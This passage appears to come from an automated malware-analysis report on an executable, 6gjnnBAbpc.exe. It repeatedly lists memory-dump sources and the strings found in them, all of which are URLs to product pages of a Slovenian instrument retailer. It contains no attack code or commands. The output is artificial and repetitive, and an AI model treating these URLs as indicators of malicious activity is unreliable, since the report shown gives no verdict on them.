                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/kalibracija-vlage-rotronic-naprave-za-kalibracijo-s
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/o2-rotronic-analizatorji-kisika/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/rms-rotronic-monitoring-sistem-2/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/sw-rotronic-programska-oprema/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/temperatura-rotronic-merilniki-temperature/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/tlak-rotronic-merilniki-tlaka/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/vlaga-rotronic-merilniki-relativne-vlaznosti-rotron
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/dodatki/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/elektronika/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/merilna-celica/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/merilni-pin/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 